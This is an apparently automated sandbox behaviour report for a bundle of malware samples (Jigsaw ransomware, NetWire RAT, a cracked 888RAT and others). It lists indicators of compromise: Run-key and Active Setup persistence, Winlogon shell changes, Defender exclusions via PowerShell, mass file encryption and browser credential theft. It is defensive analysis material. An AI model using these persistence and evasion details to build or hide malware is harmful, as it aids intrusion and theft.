jigsaw | hxxps://github[.]com/ThatSINEWAVE/Malware-Samples

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "empty"	04df8dd30da8b5853f48cc1ac9b695a8.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "empty"	04df8dd30da8b5853f48cc1ac9b695a8.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "empty"	04df8dd30da8b5853f48cc1ac9b695a8.exe

NetWire RAT payload 1 IoCs

rat

resource	yara_rule
behavioral1/files/0x0003000000007481-1029.dat	netwire

Netwire
Netwire is a RAT with main functionalities focused password stealing and keylogging, but also includes remote control capabilities as well.
botnet stealer netwire
Renames multiple (3547) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware
Renames multiple (385) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Boot or Logon Autostart Execution: Active Setup 2 TTPs 2 IoCs

Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

persistence

Active Setup

T1547.014

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{C75DMOOV-L0WV-EW1N-586E-844U6R168E1R}\StubPath = "\"C:\\Users\\Admin\\AppData\\Roaming\\Install\\adobereader.exe\""	adobereader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{C75DMOOV-L0WV-EW1N-586E-844U6R168E1R}	adobereader.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1508	powershell.exe
1304	powershell.exe

Disables Task Manager via registry modification
evasion

Possible privilege escalation attempt 21 IoCs

exploit

pid	Process
2592	takeown.exe
1720	takeown.exe
1984	takeown.exe
3952	takeown.exe
1100	icacls.exe
3324	icacls.exe
4552	takeown.exe
4308	icacls.exe
3980	icacls.exe
1588	takeown.exe
4772	icacls.exe
196	icacls.exe
2160	takeown.exe
2272	icacls.exe
3640	takeown.exe
620	takeown.exe
1940	takeown.exe
672	icacls.exe
2808	takeown.exe
5048	icacls.exe
3192	takeown.exe

ACProtect 1.3x - 1.4x DLL software 1 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral1/files/0x000d00000001abe2-589.dat	acprotect

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MicroCop.lnk	XMoon.exe

Executes dropped EXE 13 IoCs

pid	Process
4240	888RAT 1.1.1 cracked.exe
1872	fps boost .exe
4488	fps boost .exe
2796	0f0298d80bf7369901281c60c.exe
2988	excel.sfx.exe
4576	excel.exe
3332	adobereader.exe
4076	XMoon.exe
4240	jigsaw.exe
3656	drpbx.exe
264	04df8dd30da8b5853f48cc1ac9b695a8.exe
4796	04df8dd30da8b5853f48cc1ac9b695a8.exe
4116	04df8dd30da8b5853f48cc1ac9b695a8.exe

Loads dropped DLL 20 IoCs

pid	Process
4240	888RAT 1.1.1 cracked.exe
4240	888RAT 1.1.1 cracked.exe
4240	888RAT 1.1.1 cracked.exe
4240	888RAT 1.1.1 cracked.exe
4488	fps boost .exe
4488	fps boost .exe
4488	fps boost .exe
4488	fps boost .exe
4488	fps boost .exe
4488	fps boost .exe
4488	fps boost .exe
4488	fps boost .exe
4488	fps boost .exe
4488	fps boost .exe
4488	fps boost .exe
4488	fps boost .exe
4488	fps boost .exe
4488	fps boost .exe
4488	fps boost .exe
4488	fps boost .exe

Modifies file permissions 1 TTPs 21 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
4772	icacls.exe
1984	takeown.exe
3324	icacls.exe
2592	takeown.exe
3952	takeown.exe
1940	takeown.exe
1588	takeown.exe
5048	icacls.exe
1100	icacls.exe
196	icacls.exe
4552	takeown.exe
4308	icacls.exe
620	takeown.exe
3980	icacls.exe
3192	takeown.exe
3640	takeown.exe
2160	takeown.exe
2272	icacls.exe
672	icacls.exe
2808	takeown.exe
1720	takeown.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe"	jigsaw.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Windows\CurrentVersion\Run\Powerpoint = "C:\\Users\\Admin\\AppData\\Roaming\\Install\\adobereader.exe"	adobereader.exe

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\b:	XMoon.exe
File opened (read-only)	\??\e:	XMoon.exe
File opened (read-only)	\??\i:	XMoon.exe
File opened (read-only)	\??\x:	XMoon.exe
File opened (read-only)	\??\o:	XMoon.exe
File opened (read-only)	\??\q:	XMoon.exe
File opened (read-only)	\??\r:	XMoon.exe
File opened (read-only)	\??\w:	XMoon.exe
File opened (read-only)	\??\j:	XMoon.exe
File opened (read-only)	\??\l:	XMoon.exe
File opened (read-only)	\??\m:	XMoon.exe
File opened (read-only)	\??\n:	XMoon.exe
File opened (read-only)	\??\y:	XMoon.exe
File opened (read-only)	\??\s:	XMoon.exe
File opened (read-only)	\??\v:	XMoon.exe
File opened (read-only)	\??\z:	XMoon.exe
File opened (read-only)	\??\a:	XMoon.exe
File opened (read-only)	\??\h:	XMoon.exe
File opened (read-only)	\??\k:	XMoon.exe
File opened (read-only)	\??\p:	XMoon.exe
File opened (read-only)	\??\g:	XMoon.exe
File opened (read-only)	\??\t:	XMoon.exe
File opened (read-only)	\??\u:	XMoon.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
39	raw.githubusercontent.com
40	raw.githubusercontent.com

AutoIT Executable 12 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x000800000001abe1-556.dat	autoit_exe
behavioral1/memory/4240-603-0x0000000000E00000-0x0000000003470000-memory.dmp	autoit_exe
behavioral1/memory/4240-608-0x0000000000E00000-0x0000000003470000-memory.dmp	autoit_exe
behavioral1/memory/4240-611-0x0000000000E00000-0x0000000003470000-memory.dmp	autoit_exe
behavioral1/memory/4240-614-0x0000000000E00000-0x0000000003470000-memory.dmp	autoit_exe
behavioral1/memory/4240-605-0x0000000000E00000-0x0000000003470000-memory.dmp	autoit_exe
behavioral1/memory/4240-620-0x0000000000E00000-0x0000000003470000-memory.dmp	autoit_exe
behavioral1/memory/4240-629-0x0000000000E00000-0x0000000003470000-memory.dmp	autoit_exe
behavioral1/memory/4240-640-0x0000000000E00000-0x0000000003470000-memory.dmp	autoit_exe
behavioral1/memory/4240-646-0x0000000000E00000-0x0000000003470000-memory.dmp	autoit_exe
behavioral1/memory/4240-656-0x0000000000E00000-0x0000000003470000-memory.dmp	autoit_exe
behavioral1/memory/4076-1204-0x0000000000400000-0x0000000000506000-memory.dmp	autoit_exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

discovery

Process Discovery

T1057

pid	Process
4248	tasklist.exe

Sets desktop wallpaper using registry 2 TTPs 4 IoCs

ransomware

Defacement

T1491

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wp.bmp"	04df8dd30da8b5853f48cc1ac9b695a8.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wl.jpg"	XMoon.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wp.bmp"	04df8dd30da8b5853f48cc1ac9b695a8.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wp.bmp"	04df8dd30da8b5853f48cc1ac9b695a8.exe

UPX packed file 56 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x00060000000151fc-538.dat	upx
behavioral1/files/0x000d00000001abe2-589.dat	upx
behavioral1/memory/4240-597-0x00000000085A0000-0x000000000865B000-memory.dmp	upx
behavioral1/memory/4240-694-0x00000000085A0000-0x000000000865B000-memory.dmp	upx
behavioral1/files/0x000800000001ac2b-741.dat	upx
behavioral1/memory/4488-745-0x00007FF8BA2F0000-0x00007FF8BA8E0000-memory.dmp	upx
behavioral1/files/0x000800000001ac1c-747.dat	upx
behavioral1/files/0x000800000001ac29-749.dat	upx
behavioral1/files/0x000800000001ac25-766.dat	upx
behavioral1/memory/4488-768-0x00007FF8D1490000-0x00007FF8D149F000-memory.dmp	upx
behavioral1/memory/4488-767-0x00007FF8CB980000-0x00007FF8CB9A4000-memory.dmp	upx
behavioral1/files/0x000800000001ac24-765.dat	upx
behavioral1/files/0x000800000001ac23-764.dat	upx
behavioral1/files/0x000800000001ac20-763.dat	upx
behavioral1/files/0x000800000001ac1f-762.dat	upx
behavioral1/files/0x000800000001ac1e-761.dat	upx
behavioral1/files/0x000800000001ac1d-760.dat	upx
behavioral1/files/0x000800000001ac1a-759.dat	upx
behavioral1/files/0x000800000001ac31-758.dat	upx
behavioral1/files/0x000800000001ac30-757.dat	upx
behavioral1/files/0x000800000001ac2e-756.dat	upx
behavioral1/files/0x000800000001ac2a-753.dat	upx
behavioral1/files/0x000800000001ac28-752.dat	upx
behavioral1/memory/4488-774-0x00007FF8CA530000-0x00007FF8CA55D000-memory.dmp	upx
behavioral1/memory/4488-776-0x00007FF8CA4E0000-0x00007FF8CA4F9000-memory.dmp	upx
behavioral1/memory/4488-778-0x00007FF8BA2C0000-0x00007FF8BA2E3000-memory.dmp	upx
behavioral1/memory/4488-779-0x00007FF8BA140000-0x00007FF8BA2B6000-memory.dmp	upx
behavioral1/memory/4488-780-0x00007FF8CA310000-0x00007FF8CA329000-memory.dmp	upx
behavioral1/memory/4488-781-0x00007FF8CF320000-0x00007FF8CF32D000-memory.dmp	upx
behavioral1/memory/4488-783-0x00007FF8BA100000-0x00007FF8BA133000-memory.dmp	upx
behavioral1/memory/4488-784-0x00007FF8B9B00000-0x00007FF8B9BCD000-memory.dmp	upx
behavioral1/memory/4488-782-0x00007FF8BA2F0000-0x00007FF8BA8E0000-memory.dmp	upx
behavioral1/memory/4488-785-0x00007FF8B9BD0000-0x00007FF8BA0F9000-memory.dmp	upx
behavioral1/memory/4488-787-0x00007FF8C9820000-0x00007FF8C9834000-memory.dmp	upx
behavioral1/memory/4488-786-0x00007FF8CB980000-0x00007FF8CB9A4000-memory.dmp	upx
behavioral1/memory/4488-788-0x00007FF8CF240000-0x00007FF8CF24D000-memory.dmp	upx
behavioral1/memory/4488-790-0x00007FF8B9980000-0x00007FF8B9A9C000-memory.dmp	upx
behavioral1/memory/4488-789-0x00007FF8CA530000-0x00007FF8CA55D000-memory.dmp	upx
behavioral1/memory/4488-905-0x00007FF8CB980000-0x00007FF8CB9A4000-memory.dmp	upx
behavioral1/memory/4488-904-0x00007FF8D1490000-0x00007FF8D149F000-memory.dmp	upx
behavioral1/memory/4488-906-0x00007FF8B9BD0000-0x00007FF8BA0F9000-memory.dmp	upx
behavioral1/memory/4488-914-0x00007FF8B9B00000-0x00007FF8B9BCD000-memory.dmp	upx
behavioral1/memory/4488-913-0x00007FF8BA100000-0x00007FF8BA133000-memory.dmp	upx
behavioral1/memory/4488-918-0x00007FF8B9980000-0x00007FF8B9A9C000-memory.dmp	upx
behavioral1/memory/4488-917-0x00007FF8CF240000-0x00007FF8CF24D000-memory.dmp	upx
behavioral1/memory/4488-916-0x00007FF8C9820000-0x00007FF8C9834000-memory.dmp	upx
behavioral1/memory/4488-915-0x00007FF8BA2F0000-0x00007FF8BA8E0000-memory.dmp	upx
behavioral1/memory/4488-912-0x00007FF8CF320000-0x00007FF8CF32D000-memory.dmp	upx
behavioral1/memory/4488-911-0x00007FF8CA310000-0x00007FF8CA329000-memory.dmp	upx
behavioral1/memory/4488-910-0x00007FF8BA140000-0x00007FF8BA2B6000-memory.dmp	upx
behavioral1/memory/4488-909-0x00007FF8BA2C0000-0x00007FF8BA2E3000-memory.dmp	upx
behavioral1/memory/4488-908-0x00007FF8CA4E0000-0x00007FF8CA4F9000-memory.dmp	upx
behavioral1/memory/4488-907-0x00007FF8CA530000-0x00007FF8CA55D000-memory.dmp	upx
behavioral1/memory/4240-1016-0x00000000085A0000-0x000000000865B000-memory.dmp	upx
behavioral1/memory/4076-1032-0x0000000000400000-0x0000000000506000-memory.dmp	upx
behavioral1/memory/4076-1204-0x0000000000400000-0x0000000000506000-memory.dmp	upx

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files\Microsoft Office\root\rsod\osm.x-none.msi.16.x-none.tree.dat.fun	drpbx.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Messaging_3.26.24002.0_x64__8wekyb3d8bbwe\Assets\starttile.dualsim2.wink.scale-200.png	drpbx.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_neutral_resources.scale-150_8wekyb3d8bbwe\Assets\contrast-black\Logo.scale-150_contrast-black.png	drpbx.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\it_get.svg	drpbx.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxA-Outlook.scale-250.png	drpbx.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\Assets\AppTiles\StoreAppList.targetsize-64_altform-unplated.png	drpbx.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\base.xml	drpbx.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\pt-br\ui-strings.js.fun	drpbx.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\Assets\TimerLargeTile.contrast-black_scale-200.png	drpbx.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.contrast-black_targetsize-16_altform-unplated.png	drpbx.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe\Assets\ThankYou\GenericEnglish-1.jpg	drpbx.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\images\Audio-48.png	drpbx.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_checkbox_unselected_18.svg.fun	drpbx.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\s_filetype_psd.svg.fun	drpbx.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Getstarted_4.5.6.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-16_altform-unplated_contrast-white.png	drpbx.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\OneNoteAppList.targetsize-64_altform-unplated.png	drpbx.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.People_10.1.10531.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-black\PeopleSplashScreen.scale-125.png	drpbx.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Car\LTR\contrast-white\WideTile.scale-200.png	drpbx.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner.png	drpbx.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\sk-sk\ui-strings.js.fun	drpbx.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxMailAppList.scale-125.png	drpbx.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageAppList.targetsize-16_altform-unplated_contrast-white.png	drpbx.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\trash.gif	drpbx.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxA-Advanced-Dark.scale-125.png	drpbx.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000049\StoreLogo.png	drpbx.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\small\blushing.png	drpbx.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ug.txt	drpbx.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\6440_48x48x32.png	drpbx.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.Windows.Photos_16.511.8780.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\PhotosWideTile.contrast-black_scale-125.png	drpbx.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\py_60x42.png	drpbx.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\include\jdwpTransport.h	drpbx.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Fues\Popup_shadow_2.png	drpbx.exe
File opened for modification	C:\Program Files\Java\jre-1.8\lib\images\cursors\win32_LinkDrop32x32.gif	drpbx.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Getstarted_4.5.6.0_x64__8wekyb3d8bbwe\Content\surfaceHub\en-US\doc_offline_getconnected.xml	drpbx.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\es-es\ui-strings.js.fun	drpbx.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\eu-es\ui-strings.js.fun	drpbx.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Getstarted_4.5.6.0_x64__8wekyb3d8bbwe\Content\desktop\en-GB\doc_offline_narrator.xml	drpbx.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ja-jp\ui-strings.js.fun	drpbx.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\ar_get.svg.fun	drpbx.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorWideTile.contrast-black_scale-200.png	drpbx.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\bun.png.fun	drpbx.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\CalculatorSmallTile.scale-125.png	drpbx.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Awards\pyramid\Theres_a_Timed-Mode_.png	drpbx.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\423x173\46.jpg	drpbx.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Beach\mask\12h.png	drpbx.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]	drpbx.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\LoadIcon_contrast-black.png	drpbx.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Arkadium.Win10.StarClub\Assets\star-rotating-57x54.png	drpbx.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\S_IlluEmptyStateDCFiles_280x192.svg.fun	drpbx.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\dc-annotations\js\plugin.js.fun	drpbx.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\pt-br\ui-strings.js	drpbx.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Livetiles\MicrosoftSolitaireAppList.scale-200.png	drpbx.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\create_form.gif.fun	drpbx.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-addtotable-dark.png	drpbx.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\it-it\ui-strings.js.fun	drpbx.exe
File created	C:\Program Files\Java\jre-1.8\THIRDPARTYLICENSEREADME.txt.fun	drpbx.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2017.125.40.0_neutral_~_8wekyb3d8bbwe\AppxBlockMap.xml	drpbx.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-36_altform-fullcolor.png	drpbx.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppPackageAppList.targetsize-20_contrast-black.png	drpbx.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.511.8780.0_x64__8wekyb3d8bbwe\Lumia.ViewerPlugin\Assets\IconEditRichCapture.contrast-white_scale-200.png	drpbx.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\move.svg.fun	drpbx.exe
File opened for modification	C:\Program Files\7-Zip\Lang\kaa.txt	drpbx.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\5941_32x32x32.png	drpbx.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\StoreAppList.targetsize-16.png	drpbx.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	888RAT 1.1.1 cracked.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	0f0298d80bf7369901281c60c.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	excel.sfx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	excel.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	adobereader.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	XMoon.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe

Enumerates system info in registry 2 TTPs 9 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies Control Panel 1 IoCs

evasion

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Control Panel\Desktop	XMoon.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133740682087054054"	chrome.exe

Modifies registry class 6 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings	XMoon.exe
Key created	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings	04df8dd30da8b5853f48cc1ac9b695a8.exe
Key created	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings	04df8dd30da8b5853f48cc1ac9b695a8.exe
Key created	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings	04df8dd30da8b5853f48cc1ac9b695a8.exe
Key created	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings	chrome.exe

Opens file in notepad (likely ransom note) 3 IoCs

ransomware

pid	Process
1928	NOTEPAD.EXE
4832	NOTEPAD.EXE
3520	NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3204	chrome.exe
3204	chrome.exe
4240	888RAT 1.1.1 cracked.exe
4240	888RAT 1.1.1 cracked.exe
1304	powershell.exe
1304	powershell.exe
1508	powershell.exe
1508	powershell.exe
1304	powershell.exe
1508	powershell.exe
1304	powershell.exe
1508	powershell.exe
4076	XMoon.exe
4076	XMoon.exe
4076	XMoon.exe
4076	XMoon.exe
4076	XMoon.exe
4076	XMoon.exe
4076	XMoon.exe
4076	XMoon.exe
4076	XMoon.exe
4076	XMoon.exe
4076	XMoon.exe
4076	XMoon.exe
4076	XMoon.exe
4076	XMoon.exe
4076	XMoon.exe
4076	XMoon.exe
4076	XMoon.exe
4076	XMoon.exe
4076	XMoon.exe
4076	XMoon.exe
4076	XMoon.exe
4076	XMoon.exe
4076	XMoon.exe
4076	XMoon.exe
4076	XMoon.exe
4076	XMoon.exe
